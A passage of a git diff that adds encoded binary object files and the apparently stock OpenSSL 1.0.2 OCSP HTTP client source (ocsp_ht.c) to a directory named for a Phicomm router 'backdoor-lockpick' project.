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
Xnm>F8aI-&ni7?l0bxz~Is{OwK#dpaA

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ht.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ht.c
new file mode 100644
index 0000000..88b26b3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ht.c
@@ -0,0 +1,555 @@
+/* ocsp_ht.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+#include <string.h>
+#include "e_os.h"
+#include <openssl/asn1.h>
+#include <openssl/ocsp.h>
+#include <openssl/err.h>
+#include <openssl/buffer.h>
+#ifdef OPENSSL_SYS_SUNOS
+# define strtoul (unsigned long)strtol
+#endif                          /* OPENSSL_SYS_SUNOS */
+
+/* Stateful OCSP request code, supporting non-blocking I/O */
+
+/* Opaque OCSP request status structure */
+
+struct ocsp_req_ctx_st {
+    int state;                  /* Current I/O state */
+    unsigned char *iobuf;       /* Line buffer */
+    int iobuflen;               /* Line buffer length */
+    BIO *io;                    /* BIO to perform I/O with */
+    BIO *mem;                   /* Memory BIO response is built into */
+    unsigned long asn1_len;     /* ASN1 length of response */
+    unsigned long max_resp_len; /* Maximum length of response */
+};
+
+#define OCSP_MAX_RESP_LENGTH    (100 * 1024)
+#define OCSP_MAX_LINE_LEN       4096;
+
+/* OCSP states */
+
+/* If set no reading should be performed */
+#define OHS_NOREAD              0x1000
+/* Error condition */
+#define OHS_ERROR               (0 | OHS_NOREAD)
+/* First line being read */
+#define OHS_FIRSTLINE           1
+/* MIME headers being read */
+#define OHS_HEADERS             2
+/* OCSP initial header (tag + length) being read */
+#define OHS_ASN1_HEADER         3
+/* OCSP content octets being read */
+#define OHS_ASN1_CONTENT        4
+/* First call: ready to start I/O */
+#define OHS_ASN1_WRITE_INIT     (5 | OHS_NOREAD)
+/* Request being sent */
+#define OHS_ASN1_WRITE          (6 | OHS_NOREAD)
+/* Request being flushed */
+#define OHS_ASN1_FLUSH          (7 | OHS_NOREAD)
+/* Completed */
+#define OHS_DONE                (8 | OHS_NOREAD)
+/* Headers set, no final \r\n included */
+#define OHS_HTTP_HEADER         (9 | OHS_NOREAD)
+
+static int parse_http_line1(char *line);
+
+OCSP_REQ_CTX *OCSP_REQ_CTX_new(BIO *io, int maxline)
+{
+    OCSP_REQ_CTX *rctx;
+    rctx = OPENSSL_malloc(sizeof(OCSP_REQ_CTX));
+    if (!rctx)
+        return NULL;
+    rctx->state = OHS_ERROR;
+    rctx->max_resp_len = OCSP_MAX_RESP_LENGTH;
+    rctx->mem = BIO_new(BIO_s_mem());
+    rctx->io = io;
+    rctx->asn1_len = 0;
+    if (maxline > 0)
+        rctx->iobuflen = maxline;
+    else
+        rctx->iobuflen = OCSP_MAX_LINE_LEN;
+    rctx->iobuf = OPENSSL_malloc(rctx->iobuflen);
+    if (!rctx->iobuf || !rctx->mem) {
+        OCSP_REQ_CTX_free(rctx);
+        return NULL;
+    }
+    return rctx;
+}
+
+void OCSP_REQ_CTX_free(OCSP_REQ_CTX *rctx)
+{
+    if (rctx->mem)
+        BIO_free(rctx->mem);
+    if (rctx->iobuf)
+        OPENSSL_free(rctx->iobuf);
+    OPENSSL_free(rctx);
+}
+
+BIO *OCSP_REQ_CTX_get0_mem_bio(OCSP_REQ_CTX *rctx)
+{
+    return rctx->mem;
+}
+
+void OCSP_set_max_response_length(OCSP_REQ_CTX *rctx, unsigned long len)
+{
+    if (len == 0)
+        rctx->max_resp_len = OCSP_MAX_RESP_LENGTH;
+    else
+        rctx->max_resp_len = len;
+}
+
+int OCSP_REQ_CTX_i2d(OCSP_REQ_CTX *rctx, const ASN1_ITEM *it, ASN1_VALUE *val)
+{
+    static const char req_hdr[] =
+        "Content-Type: application/ocsp-request\r\n"
+        "Content-Length: %d\r\n\r\n";
+    int reqlen = ASN1_item_i2d(val, NULL, it);
+    if (BIO_printf(rctx->mem, req_hdr, reqlen) <= 0)
+        return 0;
+    if (ASN1_item_i2d_bio(it, rctx->mem, val) <= 0)
+        return 0;
+    rctx->state = OHS_ASN1_WRITE_INIT;
+    return 1;
+}
+
+int OCSP_REQ_CTX_nbio_d2i(OCSP_REQ_CTX *rctx,
+                          ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    int rv, len;
+    const unsigned char *p;
+
+    rv = OCSP_REQ_CTX_nbio(rctx);
+    if (rv != 1)
+        return rv;
+
+    len = BIO_get_mem_data(rctx->mem, &p);
+    *pval = ASN1_item_d2i(NULL, &p, len, it);
+    if (*pval == NULL) {
+        rctx->state = OHS_ERROR;
+        return 0;
+    }
+    return 1;
+}
+
+int OCSP_REQ_CTX_http(OCSP_REQ_CTX *rctx, const char *op, const char *path)
+{
+    static const char http_hdr[] = "%s %s HTTP/1.0\r\n";
+
+    if (!path)
+        path = "/";
+
+    if (BIO_printf(rctx->mem, http_hdr, op, path) <= 0)
+        return 0;
+    rctx->state = OHS_HTTP_HEADER;
+    return 1;
+}
+
+int OCSP_REQ_CTX_set1_req(OCSP_REQ_CTX *rctx, OCSP_REQUEST *req)
+{
+    return OCSP_REQ_CTX_i2d(rctx, ASN1_ITEM_rptr(OCSP_REQUEST),
+                            (ASN1_VALUE *)req);
+}
+
+int OCSP_REQ_CTX_add1_header(OCSP_REQ_CTX *rctx,
+                             const char *name, const char *value)
+{
+    if (!name)
+        return 0;
+    if (BIO_puts(rctx->mem, name) <= 0)
+        return 0;
+    if (value) {
+        if (BIO_write(rctx->mem, ": ", 2) != 2)
+            return 0;
+        if (BIO_puts(rctx->mem, value) <= 0)
+            return 0;
+    }
+    if (BIO_write(rctx->mem, "\r\n", 2) != 2)
+        return 0;
+    rctx->state = OHS_HTTP_HEADER;
+    return 1;
+}
+
+OCSP_REQ_CTX *OCSP_sendreq_new(BIO *io, const char *path, OCSP_REQUEST *req,
+                               int maxline)
+{
+
+    OCSP_REQ_CTX *rctx = NULL;
+    rctx = OCSP_REQ_CTX_new(io, maxline);
+    if (!rctx)
+        return NULL;
+
+    if (!OCSP_REQ_CTX_http(rctx, "POST", path))
+        goto err;
+
+    if (req && !OCSP_REQ_CTX_set1_req(rctx, req))
+        goto err;
+
+    return rctx;
+
+ err:
+    OCSP_REQ_CTX_free(rctx);
+    return NULL;
+}
+
+/*
+ * Parse the HTTP response. This will look like this: "HTTP/1.0 200 OK". We
+ * need to obtain the numeric code and (optional) informational message.
+ */
+
+static int parse_http_line1(char *line)
+{
+    int retcode;
+    char *p, *q, *r;
+    /* Skip to first white space (passed protocol info) */
+
+    for (p = line; *p && !isspace((unsigned char)*p); p++)
+        continue;
+    if (!*p) {
+        OCSPerr(OCSP_F_PARSE_HTTP_LINE1, OCSP_R_SERVER_RESPONSE_PARSE_ERROR);
+        return 0;
+    }
+
+    /* Skip past white space to start of response code */
+    while (*p && isspace((unsigned char)*p))
+        p++;
+
+    if (!*p) {
+        OCSPerr(OCSP_F_PARSE_HTTP_LINE1, OCSP_R_SERVER_RESPONSE_PARSE_ERROR);
+        return 0;
+    }
+
+    /* Find end of response code: first whitespace after start of code */
+    for (q = p; *q && !isspace((unsigned char)*q); q++)
+        continue;
+
+    if (!*q) {
+        OCSPerr(OCSP_F_PARSE_HTTP_LINE1, OCSP_R_SERVER_RESPONSE_PARSE_ERROR);
+        return 0;
+    }
+
+    /* Set end of response code and start of message */
+    *q++ = 0;
+
+    /* Attempt to parse numeric code */
+    retcode = strtoul(p, &r, 10);
+
+    if (*r)
+        return 0;
+
+    /* Skip over any leading white space in message */
+    while (*q && isspace((unsigned char)*q))
+        q++;
+
+    if (*q) {
+        /*
+         * Finally zap any trailing white space in message (include CRLF)
+         */
+
+        /* We know q has a non white space character so this is OK */
+        for (r = q + strlen(q) - 1; isspace((unsigned char)*r); r--)
+            *r = 0;
+    }
+    if (retcode != 200) {
+        OCSPerr(OCSP_F_PARSE_HTTP_LINE1, OCSP_R_SERVER_RESPONSE_ERROR);
+        if (!*q)
+            ERR_add_error_data(2, "Code=", p);
+        else
+            ERR_add_error_data(4, "Code=", p, ",Reason=", q);
+        return 0;
+    }
+
+    return 1;
+
+}
+
+int OCSP_REQ_CTX_nbio(OCSP_REQ_CTX *rctx)
+{
+    int i, n;
+    const unsigned char *p;
+ next_io:
+    if (!(rctx->state & OHS_NOREAD)) {
+        n = BIO_read(rctx->io, rctx->iobuf, rctx->iobuflen);
+
+        if (n <= 0) {
+            if (BIO_should_retry(rctx->io))
+                return -1;
+            return 0;
+        }
+
+        /* Write data to memory BIO */
+
+        if (BIO_write(rctx->mem, rctx->iobuf, n) != n)
+            return 0;
+    }
+
+    switch (rctx->state) {
+    case OHS_HTTP_HEADER:
+        /* Last operation was adding headers: need a final \r\n */
+        if (BIO_write(rctx->mem, "\r\n", 2) != 2) {
+            rctx->state = OHS_ERROR;
+            return 0;
+        }
+        rctx->state = OHS_ASN1_WRITE_INIT;
+
+    case OHS_ASN1_WRITE_INIT:
+        rctx->asn1_len = BIO_get_mem_data(rctx->mem, NULL);
+        rctx->state = OHS_ASN1_WRITE;
+
+    case OHS_ASN1_WRITE:
+        n = BIO_get_mem_data(rctx->mem, &p);
+
+        i = BIO_write(rctx->io, p + (n - rctx->asn1_len), rctx->asn1_len);
+
+        if (i <= 0) {
+            if (BIO_should_retry(rctx->io))
+                return -1;
+            rctx->state = OHS_ERROR;
+            return 0;
+        }
+
+        rctx->asn1_len -= i;
+
+        if (rctx->asn1_len > 0)
+            goto next_io;
+
+        rctx->state = OHS_ASN1_FLUSH;
+
+        (void)BIO_reset(rctx->mem);
+
+    case OHS_ASN1_FLUSH:
+
+        i = BIO_flush(rctx->io);
+
+        if (i > 0) {
+            rctx->state = OHS_FIRSTLINE;
+            goto next_io;
+        }
+
+        if (BIO_should_retry(rctx->io))
+            return -1;
+
+        rctx->state = OHS_ERROR;
+        return 0;
+
+    case OHS_ERROR:
+        return 0;
+
+    case OHS_FIRSTLINE:
+    case OHS_HEADERS:
+
+        /* Attempt to read a line in */
+
+ next_line:
+        /*
+         * Due to &%^*$" memory BIO behaviour with BIO_gets we have to check
+         * there's a complete line in there before calling BIO_gets or we'll
+         * just get a partial read.
+         */
+        n = BIO_get_mem_data(rctx->mem, &p);
+        if ((n <= 0) || !memchr(p, '\n', n)) {
+            if (n >= rctx->iobuflen) {
+                rctx->state = OHS_ERROR;
+                return 0;
+            }
+            goto next_io;
+        }
+        n = BIO_gets(rctx->mem, (char *)rctx->iobuf, rctx->iobuflen);
+
+        if (n <= 0) {
+            if (BIO_should_retry(rctx->mem))
+                goto next_io;
+            rctx->state = OHS_ERROR;
+            return 0;
+        }
+
+        /* Don't allow excessive lines */
+        if (n == rctx->iobuflen) {
+            rctx->state = OHS_ERROR;
+            return 0;
+        }
+
+        /* First line */
+        if (rctx->state == OHS_FIRSTLINE) {
+            if (parse_http_line1((char *)rctx->iobuf)) {
+                rctx->state = OHS_HEADERS;
+                goto next_line;
+            } else {
+                rctx->state = OHS_ERROR;
+                return 0;
+            }
+        } else {
+            /* Look for blank line: end of headers */
+            for (p = rctx->iobuf; *p; p++) {
+                if ((*p != '\r') && (*p != '\n'))
+                    break;
+            }
+            if (*p)
+                goto next_line;
+
+            rctx->state = OHS_ASN1_HEADER;
+
+        }
+
+        /* Fall thru */
+
+    case OHS_ASN1_HEADER:
+        /*
+         * Now reading ASN1 header: can read at least 2 bytes which is enough
+         * for ASN1 SEQUENCE header and either length field or at least the
+         * length of the length field.
+         */
+        n = BIO_get_mem_data(rctx->mem, &p);
+        if (n < 2)
+            goto next_io;
+
+        /* Check it is an ASN1 SEQUENCE */
+        if (*p++ != (V_ASN1_SEQUENCE | V_ASN1_CONSTRUCTED)) {
+            rctx->state = OHS_ERROR;
+            return 0;
+        }
+
+        /* Check out length field */
+        if (*p & 0x80) {
+            /*
+             * If MSB set on initial length octet we can now always read 6
+             * octets: make sure we have them.
+             */
+            if (n < 6)
+                goto next_io;
+            n = *p & 0x7F;
+            /* Not NDEF or excessive length */
+            if (!n || (n > 4)) {
+                rctx->state = OHS_ERROR;
+                return 0;
+            }
+            p++;
+            rctx->asn1_len = 0;
+            for (i = 0; i < n; i++) {
+                rctx->asn1_len <<= 8;
+                rctx->asn1_len |= *p++;
+            }
+
+            if (rctx->asn1_len > rctx->max_resp_len) {
+                rctx->state = OHS_ERROR;
+                return 0;
+            }
+
+            rctx->asn1_len += n + 2;
+        } else
+            rctx->asn1_len = *p + 2;
+
+        rctx->state = OHS_ASN1_CONTENT;
+
+        /* Fall thru */
+
+    case OHS_ASN1_CONTENT:
+        n = BIO_get_mem_data(rctx->mem, NULL);
+        if (n < (int)rctx->asn1_len)
+            goto next_io;
+
+        rctx->state = OHS_DONE;
+        return 1;
+
+        break;
+
+    case OHS_DONE:
+        return 1;
+
+    }
+
+    return 0;
+
+}
+
+int OCSP_sendreq_nbio(OCSP_RESPONSE **presp, OCSP_REQ_CTX *rctx)
+{
+    return OCSP_REQ_CTX_nbio_d2i(rctx,
+                                 (ASN1_VALUE **)presp,
+                                 ASN1_ITEM_rptr(OCSP_RESPONSE));
+}
+
+/* Blocking OCSP request handler: now a special case of non-blocking I/O */
+
+OCSP_RESPONSE *OCSP_sendreq_bio(BIO *b, const char *path, OCSP_REQUEST *req)
+{
+    OCSP_RESPONSE *resp = NULL;
+    OCSP_REQ_CTX *ctx;
+    int rv;
+
+    ctx = OCSP_sendreq_new(b, path, req, -1);
+
+    if (!ctx)
+        return NULL;
+
+    do {
+        rv = OCSP_sendreq_nbio(&resp, ctx);
+    } while ((rv == -1) && BIO_should_retry(b));
+
+    OCSP_REQ_CTX_free(ctx);
+
+    if (rv)
+        return resp;
+
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ht.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ht.o
new file mode 100644
index 0000000000000000000000000000000000000000..bece13ae6d06421ca074094730ca3cac66a20ac8
GIT binary patch
literal 8232
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
